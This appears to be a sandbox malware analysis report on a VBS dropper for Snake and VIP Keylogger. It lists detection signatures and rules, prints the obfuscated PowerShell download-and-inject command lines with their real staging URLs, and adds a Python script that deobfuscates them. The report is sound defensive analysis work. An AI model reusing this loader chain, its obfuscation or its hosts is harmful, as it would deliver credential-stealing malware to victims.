Windows
Analysis Report
Scan12112024,pdf.vbs
Overview
General Information
Detection
Snake Keylogger, VIP Keylogger
Field | Value
---|---
Score | 100
Range | 0 - 100
Whitelisted | false
Confidence | 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
Yara detected Powershell download and execute
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VBS Downloader Generic
Yara detected VIP Keylogger
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Obfuscated command line found
Potential malicious VBS script found (has network functionality)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: WScript or CScript Dropper - File
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Windows Shell Script Host drops VBS files
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 6380 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Scan12112024,pdf.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- wscript.exe (PID: 2608 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\bJYfKeNSnhCTjDYSPw.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- powershell.exe (PID: 1432 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYlpOaW1hZ2VVcmwgPSBSckhodHRwczovLzEwMTcuZmlsZW1haWwuY29tL2FwaS9maWxlL2dldD9maWxla2V5PTJBJysnYV9iV285UmV1NCcrJzV0N0JVMWtWZ3NkOXBUOXBnU1NsdlN0JysnR3JuVElDZkZobVRLajNMQzZTUXRJY09jX1QzJysnNXcmcGtfdmlkPWZkNGY2MTRiYjIwOWM2MmMxNzMwOTQ1MTc2YTA5MDRmIFJySDtiWk53ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O2JaTmltYWdlQnl0ZXMgPSBiWk53ZWJDbGllbnQuRG93bmxvYWREYXRhKGJaTmltYWdlVXJsKTtiWk5pbWFnZVRleHQgPScrJyBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyhiWk5pbWFnZUJ5dGVzKTtiWk5zdGFydEZsYWcgPSBSckg8PEJBU0U2NF9TVEFSVD4+UnJIO2JaTmVuZEZsYWcgPSBSckg8PEJBU0U2NF9FTkQ+PlJySDtiWk5zdGFydEluZGV4ID0gJysnYlpOaW1hZ2VUZXh0LkluZGV4T2YoYlpOc3RhcnRGbGFnKTtiWk5lbmRJbmRleCA9IGJaTmltYWdlVGV4dC5JbmQnKydleE9mKGJaTmVuZEZsYScrJ2cpO2JaTnN0YXJ0SW5kZXggLWdlIDAgLWFuZCBiWk5lbmRJbmRleCAtZ3QgYlpOc3RhcicrJ3RJbicrJ2RlJysneDtiWk5zdGFydEluZGV4ICs9IGJaTnN0YXJ0RmxhZy5MZW5ndGg7YlpOYmFzZTY0TCcrJ2VuZ3RoID0gYlpOZW5kSW5kZXggJysnLSBiWk5zdGFyJysndEluZGV4O2JaTmJhc2U2NENvbW1hbmQgPSBiWk5pbWFnJysnZVRleHQuU3Vic3RyaScrJ25nKGJaTnN0YXJ0SW5kZXgsIGJaTmJhc2U2NExlbmd0aCk7YlpOYmFzZTY0UicrJ2V2ZXJzZWQgPSAtam9pbiAoYlpOYmFzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIFpBUiBGb3JFYWNoLU9iamVjdCB7IGJaTl8gJysnfSlbLTEuLi0oYlpOYmFzZTY0Q29tbWFuZC5MZW5ndGgpXTtiWk5jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKGJaTmJhc2U2JysnNFJldmVyc2VkKTtiWk5sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoYlpOY29tJysnbWFuZEJ5dGVzKTtiWk52YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKFJySFZBSVJySCk7YlpOdmFpTWV0aG9kLkludm9rZShiWk5udWxsLCBAKFJySHR4dC5MU1NXUy9rbG8vdWUuaHN1cHdzcmVsbCcrJ29yLnN1cC8vOnB0dGhSckgsIFJySGRlc2F0aXZhZG9SckgsIFJyJysnSGRlc2F0aXZhZG9SckgsIFJySGRlc2F0aXZhZG9SckgsIFJySGRlc2F0aXZhZG8nKydScicrJ0gsIFJySDFSckgsIFJySHN2Y2hvc3RSckgsIFJySGRlc2F0aXYnKydhZG9SckgsIFJySGRlc2F0JysnaXZhZG9SckgsUnJIZGVzYXRpJysndmFkb1JySCxSckhkZXNhdGl2YWRvUnJILFJySGRlc2F0aXZhZG9SckgsUnJIMVJySCxSckhkZXNhdGl2YWRvUnJIKSk7JyktQ1JlcExBQ2UgKFtjSEFyXTgyK1tjSEFyXTExNCtbY0hBcl03MiksW2NIQXJdMzkgIC1yRVBsQUNFKFtjSEFyXTk4K1tjSEFyXTkwK1tjSEFyXTc4KSxbY0hBcl0zNiAtQ1JlcExBQ2UnWkFSJyxbY0hBcl0xMjQpIHwgLiAoICRwU2hvTWVbNF0rJFBzaG9NRVszNF0rJ1gnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 3232 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('bZNimageUrl = RrHhttps://1017.filemail.com/api/file/get?filekey=2A'+'a_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T3'+'5w&pk_vid=fd4f614bb209c62c1730945176a0904f RrH;bZNwebClient = New-Object System.Net.WebClient;bZNimageBytes = bZNwebClient.DownloadData(bZNimageUrl);bZNimageText ='+' [System.Text.Encoding]::UTF8.GetString(bZNimageBytes);bZNstartFlag = RrH<<BASE64_START>>RrH;bZNendFlag = RrH<<BASE64_END>>RrH;bZNstartIndex = '+'bZNimageText.IndexOf(bZNstartFlag);bZNendIndex = bZNimageText.Ind'+'exOf(bZNendFla'+'g);bZNstartIndex -ge 0 -and bZNendIndex -gt bZNstar'+'tIn'+'de'+'x;bZNstartIndex += bZNstartFlag.Length;bZNbase64L'+'ength = bZNendIndex '+'- bZNstar'+'tIndex;bZNbase64Command = bZNimag'+'eText.Substri'+'ng(bZNstartIndex, bZNbase64Length);bZNbase64R'+'eversed = -join (bZNbase64Command.ToCharArray() ZAR ForEach-Object { bZN_ '+'})[-1..-(bZNbase64Command.Length)];bZNcommandBytes = [System.Convert]::FromBase64String(bZNbase6'+'4Reversed);bZNloadedAssembly = [System.Reflection.Assembly]::Load(bZNcom'+'mandBytes);bZNvaiMethod = [dnlib.IO.Home].GetMethod(RrHVAIRrH);bZNvaiMethod.Invoke(bZNnull, @(RrHtxt.LSSWS/klo/ue.hsupwsrell'+'or.sup//:ptthRrH, RrHdesativadoRrH, Rr'+'HdesativadoRrH, RrHdesativadoRrH, RrHdesativado'+'Rr'+'H, RrH1RrH, RrHsvchostRrH, RrHdesativ'+'adoRrH, RrHdesat'+'ivadoRrH,RrHdesati'+'vadoRrH,RrHdesativadoRrH,RrHdesativadoRrH,RrH1RrH,RrHdesativadoRrH));')-CRepLACe ([cHAr]82+[cHAr]114+[cHAr]72),[cHAr]39 -rEPlACE([cHAr]98+[cHAr]90+[cHAr]78),[cHAr]36 -CRepLACe'ZAR',[cHAr]124) | . ( $pShoMe[4]+$PshoME[34]+'X')" MD5: 04029E121A0CFA5991749937DD22A1D9)
- svchost.exe (PID: 7440 cmdline: "C:\Windows\SysWOW64\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
- cleanup
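The two PowerShell stages in the process tree above, worked through as an added example (this is analysis tooling written for this report, not code from the report or from the sample). Stage one (PID 1432) only base64-decodes $Codigo and re-launches powershell.exe with the result; stage two (PID 3232) is the -command string shown for that process. It is built from concatenated single-quoted fragments in which the tokens RrH, bZN and ZAR stand in for the quote, dollar and pipe characters; three -creplace calls restore them at run time, and the result is piped into $PSHOME[4]+$PSHOME[34]+'X', which spells ieX (Invoke-Expression) without the cmdlet name ever appearing on the command line. The script below undoes those substitutions offline, pulls out the argument list handed to dnlib.IO.Home.VAI, and re-implements the loader's payload-carving step (text between <<BASE64_START>> and <<BASE64_END>>, reversed, then base64-decoded) against a constructed stand-in for the file it downloads. The hosted text, the fake payload bytes and the $PSHOME value are assumptions; the obfuscated command is copied from the process tree.

```python
"""Deobfuscate the PowerShell stages from the Scan12112024,pdf.vbs process tree
and mirror the loader's payload-carving logic on a constructed sample."""
import base64
import re

# -command argument of powershell.exe PID 3232 as shown in the process tree.
# Stage one (PID 1432) base64-decodes $Codigo into exactly this string.
OBFUSCATED_ARG = (
    "(('bZNimageUrl = RrHhttps://1017.filemail.com/api/file/get?filekey=2A'+'a_bWo9Reu4'+'"
    "5t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T3'+'5w&pk_vid=fd4f614bb209c6"
    "2c1730945176a0904f RrH;bZNwebClient = New-Object System.Net.WebClient;bZNimageBytes"
    " = bZNwebClient.DownloadData(bZNimageUrl);bZNimageText ='+' [System.Text.Encoding]"
    "::UTF8.GetString(bZNimageBytes);bZNstartFlag = RrH<<BASE64_START>>RrH;bZNendFlag = "
    "RrH<<BASE64_END>>RrH;bZNstartIndex = '+'bZNimageText.IndexOf(bZNstartFlag);bZNendIndex"
    " = bZNimageText.Ind'+'exOf(bZNendFla'+'g);bZNstartIndex -ge 0 -and bZNendIndex -gt "
    "bZNstar'+'tIn'+'de'+'x;bZNstartIndex += bZNstartFlag.Length;bZNbase64L'+'ength = "
    "bZNendIndex '+'- bZNstar'+'tIndex;bZNbase64Command = bZNimag'+'eText.Substri'+'ng("
    "bZNstartIndex, bZNbase64Length);bZNbase64R'+'eversed = -join (bZNbase64Command."
    "ToCharArray() ZAR ForEach-Object { bZN_ '+'})[-1..-(bZNbase64Command.Length)];"
    "bZNcommandBytes = [System.Convert]::FromBase64String(bZNbase6'+'4Reversed);"
    "bZNloadedAssembly = [System.Reflection.Assembly]::Load(bZNcom'+'mandBytes);"
    "bZNvaiMethod = [dnlib.IO.Home].GetMethod(RrHVAIRrH);bZNvaiMethod.Invoke(bZNnull, @("
    "RrHtxt.LSSWS/klo/ue.hsupwsrell'+'or.sup//:ptthRrH, RrHdesativadoRrH, Rr'+'HdesativadoRrH,"
    " RrHdesativadoRrH, RrHdesativado'+'Rr'+'H, RrH1RrH, RrHsvchostRrH, RrHdesativ'+'adoRrH,"
    " RrHdesat'+'ivadoRrH,RrHdesati'+'vadoRrH,RrHdesativadoRrH,RrHdesativadoRrH,RrH1RrH,"
    "RrHdesativadoRrH));')-CRepLACe ([cHAr]82+[cHAr]114+[cHAr]72),[cHAr]39 -rEPlACE("
    "[cHAr]98+[cHAr]90+[cHAr]78),[cHAr]36 -CRepLACe'ZAR',[cHAr]124) | . ( $pShoMe[4]+"
    "$PshoME[34]+'X')"
)

# Assumed default $PSHOME of a 64-bit Windows 10 host (the report's analysis system).
PSHOME = r"C:\Windows\System32\WindowsPowerShell\v1.0"


def _char_expr(expr):
    """Evaluate a [char]N+[char]M... expression or a 'literal' to its string."""
    expr = expr.strip()
    if expr.startswith("'"):
        return expr.strip("'")
    return "".join(chr(int(n)) for n in re.findall(r"\[char\](\d+)", expr, re.I))


def deobfuscate(arg):
    """Join the 'a'+'b' fragments, then apply the -creplace substitutions in order."""
    pairs = re.findall(
        r"-c?replace\s*\(?\s*((?:\[char\]\d+\+?)+|'[^']*')\s*\)?\s*,\s*\[char\](\d+)",
        arg, re.I)
    tail = re.search(r"\)\s*-c?replace", arg, re.I)
    literal = arg[arg.index("(('") + 2:tail.start()].strip()[1:-1]
    script = literal.replace("'+'", "")        # fragment concatenation
    for token, code in pairs:                  # RrH -> ', bZN -> $, ZAR -> |
        script = script.replace(_char_expr(token), chr(int(code)))
    return script


def iex_alias(pshome=PSHOME):
    """What $pShoMe[4]+$PshoME[34]+'X' evaluates to: the cmdlet the script is piped into."""
    return pshome[4] + pshome[34] + "X"


def invoke_arguments(script):
    """Argument list passed to dnlib.IO.Home.VAI in the decoded script."""
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\);", script)
    return [a.strip().strip("'") for a in m.group(1).split(",")]


def carve_payload(text, start_flag="<<BASE64_START>>", end_flag="<<BASE64_END>>"):
    """Mirror the loader: text between the flags, reversed, then base64-decoded."""
    start, end = text.find(start_flag), text.find(end_flag)
    if start < 0 or end <= start:              # same bounds check the loader evaluates
        return None
    reversed_b64 = text[start + len(start_flag):end]
    return base64.b64decode(reversed_b64[::-1])


# Constructed stand-in for the downloaded file: filler around the markers, with the
# base64 of a fake payload written backwards. Not a real assembly.
FAKE_PAYLOAD = b"MZ\x90\x00constructed-sample-not-a-real-assembly"
HOSTED_TEXT = ("<html>lorem ipsum<<BASE64_START>>"
               + base64.b64encode(FAKE_PAYLOAD).decode()[::-1]
               + "<<BASE64_END>>trailing junk</html>")

if __name__ == "__main__":
    script = deobfuscate(OBFUSCATED_ARG)
    print(script)
    print("piped into:", iex_alias())
    args = invoke_arguments(script)
    print("VAI args:", args, "| first arg reversed:", args[0][::-1])
    print("carved:", carve_payload(HOSTED_TEXT))
```

Reading the recovered script: the first VAI argument is a URL written backwards (reverse it to read it), and the seventh is the literal string svchost, which lines up with the "Creates a process in suspended mode", "Injects a PE file into a foreign processes" and "Uncommon Svchost Parent Process" signatures and with the SysWOW64 svchost.exe at the bottom of the process tree. The bounds check in the loader only evaluates the comparison and never branches on it, so on a download that lacks the markers it would call Substring with a negative length and throw; carve_payload returns None in that case instead.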
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keystrokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | |
No configs have been found
Rule | Description | Author
---|---|---
JoeSecurity_VBS_Downloader_Generic | Yara detected VBS Downloader Generic | Joe Security

Rule | Description | Author
---|---|---
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
(29 entries in total; only the first five are shown)
Rule | Description | Author
---|---|---
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
MALWARE_Win_RedLine | Detects RedLine infostealer | ditekSHen
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
(75 entries in total; only the first five are shown)
Rule | Description | Author
---|---|---
JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |